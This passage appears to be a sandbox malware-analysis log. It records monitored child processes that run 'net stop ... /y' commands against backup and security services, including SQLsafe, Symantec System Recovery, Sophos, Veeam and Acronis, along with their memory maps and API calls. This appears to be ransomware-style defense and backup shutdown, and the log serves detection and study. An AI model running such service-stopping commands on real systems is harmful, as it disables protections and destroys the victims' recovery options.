lpNumberOfCharsWritten=0xefbf0*=0x2) returned 1 [0085.206] NetApiBufferFree (Buffer=0x2ac0f0) returned 0x0 [0085.206] NetApiBufferFree (Buffer=0x2ac110) returned 0x0 [0085.206] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"SQLsafe Backup Service\" /y" [0085.206] exit (_Code=2) Process: id = "78" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x21e97000" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Symantec System Recovery\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4492 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4493 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4494 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4495 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4496 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4497 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4498 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4499 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4500 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4501 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4502 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4503 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4504 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4505 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4506 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 422 os_tid = 0xfec Process: id = "79" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x204bc000" os_pid = "0xc24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "70" os_parent_pid = "0xffc" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos Web Control Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4525 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4526 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4527 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4528 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 4529 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4530 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4531 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4532 start_va = 0xfffd0000 end_va = 0x100002fff entry_point = 0xfffd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4533 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4534 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4535 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4536 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4537 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4538 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4539 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4540 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4541 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4542 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4543 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 4544 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4545 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4546 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4547 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4548 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4549 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4550 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4551 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4552 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4553 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4554 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4555 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4556 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4557 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4558 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4559 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4560 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4561 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4562 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4563 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 426 os_tid = 0xf40 [0085.256] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f850 | out: lpSystemTimeAsFileTime=0x12f850*(dwLowDateTime=0xe7fd3e50, dwHighDateTime=0x1d48689)) [0085.256] GetCurrentProcessId () returned 0xc24 [0085.256] GetCurrentThreadId () returned 0xf40 [0085.256] GetTickCount () returned 0x1f2f5 [0085.256] QueryPerformanceCounter (in: lpPerformanceCount=0x12f858 | out: lpPerformanceCount=0x12f858*=1813217400000) returned 1 [0085.257] GetModuleHandleW (lpModuleName=0x0) returned 0xfffd0000 [0085.257] __set_app_type (_Type=0x1) [0085.257] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffe9c9c) returned 0x0 [0085.257] __getmainargs (in: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788, _DoWildCard=0, _StartInfo=0xffff479c | out: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788) returned 0 [0085.258] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0085.258] GetConsoleOutputCP () returned 0x1b5 [0085.258] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffffcec0 | out: lpCPInfo=0xffffcec0) returned 1 [0085.258] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0085.259] sprintf_s (in: _DstBuf=0x12f7f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0085.260] setlocale (category=0, locale=".437") returned="English_United States.437" [0085.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0085.261] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0085.261] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Web Control Service\" /y" [0085.261] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f590, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0085.261] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0085.261] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f7e8 | out: Buffer=0x12f7e8*=0x2ac0f0) returned 0x0 [0085.261] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f7e8 | out: Buffer=0x12f7e8*=0x2ac110) returned 0x0 [0085.261] _fileno (_File=0x7fefdba2a80) returned 0 [0085.261] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0085.261] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0085.262] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0085.262] _wcsicmp (_String1="config", _String2="stop") returned -16 [0085.262] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0085.262] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0085.262] _wcsicmp (_String1="file", _String2="stop") returned -13 [0085.262] _wcsicmp (_String1="files", _String2="stop") returned -13 [0085.262] _wcsicmp (_String1="group", _String2="stop") returned -12 [0085.262] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0085.262] _wcsicmp (_String1="help", _String2="stop") returned -11 [0085.262] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0085.262] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0085.262] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0085.262] _wcsicmp (_String1="session", _String2="stop") returned -15 [0085.262] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0085.262] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0085.262] _wcsicmp (_String1="share", _String2="stop") returned -12 [0085.262] _wcsicmp (_String1="start", _String2="stop") returned -14 [0085.262] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0085.262] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0085.262] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0085.262] _wcsicmp (_String1="accounts", _String2="Sophos Web Control Service") returned -18 [0085.262] _wcsicmp (_String1="computer", _String2="Sophos Web Control Service") returned -16 [0085.262] _wcsicmp (_String1="config", _String2="Sophos Web Control Service") returned -16 [0085.262] _wcsicmp (_String1="continue", _String2="Sophos Web Control Service") returned -16 [0085.262] _wcsicmp (_String1="cont", _String2="Sophos Web Control Service") returned -16 [0085.262] _wcsicmp (_String1="file", _String2="Sophos Web Control Service") returned -13 [0085.262] _wcsicmp (_String1="files", _String2="Sophos Web Control Service") returned -13 [0085.262] _wcsicmp (_String1="group", _String2="Sophos Web Control Service") returned -12 [0085.262] _wcsicmp (_String1="groups", _String2="Sophos Web Control Service") returned -12 [0085.262] _wcsicmp (_String1="help", _String2="Sophos Web Control Service") returned -11 [0085.262] _wcsicmp (_String1="helpmsg", _String2="Sophos Web Control Service") returned -11 [0085.262] _wcsicmp (_String1="localgroup", _String2="Sophos Web Control Service") returned -7 [0085.262] _wcsicmp (_String1="pause", _String2="Sophos Web Control Service") returned -3 [0085.262] _wcsicmp (_String1="session", _String2="Sophos Web Control Service") returned -10 [0085.262] _wcsicmp (_String1="sessions", _String2="Sophos Web Control Service") returned -10 [0085.262] _wcsicmp (_String1="sess", _String2="Sophos Web Control Service") returned -10 [0085.262] _wcsicmp (_String1="share", _String2="Sophos Web Control Service") returned -7 [0085.263] _wcsicmp (_String1="start", _String2="Sophos Web Control Service") returned 5 [0085.263] _wcsicmp (_String1="stats", _String2="Sophos Web Control Service") returned 5 [0085.263] _wcsicmp (_String1="statistics", _String2="Sophos Web Control Service") returned 5 [0085.263] _wcsicmp (_String1="stop", _String2="Sophos Web Control Service") returned 5 [0085.263] _wcsicmp (_String1="time", _String2="Sophos Web Control Service") returned 1 [0085.263] _wcsicmp (_String1="user", _String2="Sophos Web Control Service") returned 2 [0085.263] _wcsicmp (_String1="users", _String2="Sophos Web Control Service") returned 2 [0085.263] _wcsicmp (_String1="msg", _String2="Sophos Web Control Service") returned -6 [0085.263] _wcsicmp (_String1="messenger", _String2="Sophos Web Control Service") returned -6 [0085.263] _wcsicmp (_String1="receiver", _String2="Sophos Web Control Service") returned -1 [0085.263] _wcsicmp (_String1="rcv", _String2="Sophos Web Control Service") returned -1 [0085.263] _wcsicmp (_String1="netpopup", _String2="Sophos Web Control Service") returned -5 [0085.263] _wcsicmp (_String1="redirector", _String2="Sophos Web Control Service") returned -1 [0085.263] _wcsicmp (_String1="redir", _String2="Sophos Web Control Service") returned -1 [0085.263] _wcsicmp (_String1="rdr", _String2="Sophos Web Control Service") returned -1 [0085.263] _wcsicmp (_String1="workstation", _String2="Sophos Web Control Service") returned 4 [0085.263] _wcsicmp (_String1="work", _String2="Sophos Web Control Service") returned 4 [0085.263] _wcsicmp (_String1="wksta", _String2="Sophos Web Control Service") returned 4 [0085.263] _wcsicmp (_String1="prdr", _String2="Sophos Web Control Service") returned -3 [0085.263] _wcsicmp (_String1="devrdr", _String2="Sophos Web Control Service") returned -15 [0085.263] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos Web Control Service") returned -7 [0085.263] _wcsicmp (_String1="server", _String2="Sophos Web Control Service") returned -10 [0085.263] _wcsicmp (_String1="svr", _String2="Sophos Web Control Service") returned 7 [0085.263] _wcsicmp (_String1="srv", _String2="Sophos Web Control Service") returned 3 [0085.263] _wcsicmp (_String1="lanmanserver", _String2="Sophos Web Control Service") returned -7 [0085.263] _wcsicmp (_String1="alerter", _String2="Sophos Web Control Service") returned -18 [0085.263] _wcsicmp (_String1="netlogon", _String2="Sophos Web Control Service") returned -5 [0085.263] _wcsupr (in: _String="Sophos Web Control Service" | out: _String="SOPHOS WEB CONTROL SERVICE") returned="SOPHOS WEB CONTROL SERVICE" [0085.264] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2ace20 [0085.275] GetServiceKeyNameW (in: hSCManager=0x2ace20, lpDisplayName="SOPHOS WEB CONTROL SERVICE", lpServiceName=0xffff5750, lpcchBuffer=0x12f708 | out: lpServiceName="", lpcchBuffer=0x12f708) returned 0 [0085.276] _wcsicmp (_String1="msg", _String2="SOPHOS WEB CONTROL SERVICE") returned -6 [0085.276] _wcsicmp (_String1="messenger", _String2="SOPHOS WEB CONTROL SERVICE") returned -6 [0085.276] _wcsicmp (_String1="receiver", _String2="SOPHOS WEB CONTROL SERVICE") returned -1 [0085.276] _wcsicmp (_String1="rcv", _String2="SOPHOS WEB CONTROL SERVICE") returned -1 [0085.276] _wcsicmp (_String1="redirector", _String2="SOPHOS WEB CONTROL SERVICE") returned -1 [0085.276] _wcsicmp (_String1="redir", _String2="SOPHOS WEB CONTROL SERVICE") returned -1 [0085.276] _wcsicmp (_String1="rdr", _String2="SOPHOS WEB CONTROL SERVICE") returned -1 [0085.276] _wcsicmp (_String1="workstation", _String2="SOPHOS WEB CONTROL SERVICE") returned 4 [0085.276] _wcsicmp (_String1="work", _String2="SOPHOS WEB CONTROL SERVICE") returned 4 [0085.276] _wcsicmp (_String1="wksta", _String2="SOPHOS WEB CONTROL SERVICE") returned 4 [0085.276] _wcsicmp (_String1="prdr", _String2="SOPHOS WEB CONTROL SERVICE") returned -3 [0085.276] _wcsicmp (_String1="devrdr", _String2="SOPHOS WEB CONTROL SERVICE") returned -15 [0085.276] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS WEB CONTROL SERVICE") returned -7 [0085.276] _wcsicmp (_String1="server", _String2="SOPHOS WEB CONTROL SERVICE") returned -10 [0085.276] _wcsicmp (_String1="svr", _String2="SOPHOS WEB CONTROL SERVICE") returned 7 [0085.276] _wcsicmp (_String1="srv", _String2="SOPHOS WEB CONTROL SERVICE") returned 3 [0085.276] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS WEB CONTROL SERVICE") returned -7 [0085.276] _wcsicmp (_String1="alerter", _String2="SOPHOS WEB CONTROL SERVICE") returned -18 [0085.276] _wcsicmp (_String1="netlogon", _String2="SOPHOS WEB CONTROL SERVICE") returned -5 [0085.276] NetServiceControl (in: servername=0x0, service="SOPHOS WEB CONTROL SERVICE", opcode=0x0, arg=0x0, bufptr=0x12f710 | out: bufptr=0x12f710) returned 0x889 [0085.277] wcscpy_s (in: _Destination=0xffff80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0085.277] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0085.278] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0085.279] GetFileType (hFile=0xb) returned 0x2 [0085.279] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f5d8 | out: lpMode=0x12f5d8) returned 1 [0085.279] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12f5d0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x12f5d0*=0x1e) returned 1 [0085.279] GetFileType (hFile=0xb) returned 0x2 [0085.280] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f5d8 | out: lpMode=0x12f5d8) returned 1 [0085.280] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f5d0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x12f5d0*=0x2) returned 1 [0085.280] _ultow (in: _Dest=0x889, _Radix=1242688 | out: _Dest=0x889) returned="2185" [0085.280] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0085.280] GetFileType (hFile=0xb) returned 0x2 [0085.280] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f5d8 | out: lpMode=0x12f5d8) returned 1 [0085.281] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12f5d0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x12f5d0*=0x34) returned 1 [0085.281] GetFileType (hFile=0xb) returned 0x2 [0085.281] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f5d8 | out: lpMode=0x12f5d8) returned 1 [0085.281] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f5d0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x12f5d0*=0x2) returned 1 [0085.282] NetApiBufferFree (Buffer=0x2ac0f0) returned 0x0 [0085.282] NetApiBufferFree (Buffer=0x2ac110) returned 0x0 [0085.282] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Web Control Service\" /y" [0085.282] exit (_Code=2) Process: id = "80" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x20eb7000" os_pid = "0x8a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Veeam Backup Catalog Data Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4510 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4511 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4512 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 4513 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4514 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4515 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4516 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4517 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4518 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4519 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4520 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4521 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4522 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4523 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4524 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 424 os_tid = 0xce8 Process: id = "81" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x21fd8000" os_pid = "0xe60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop AcronisAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS 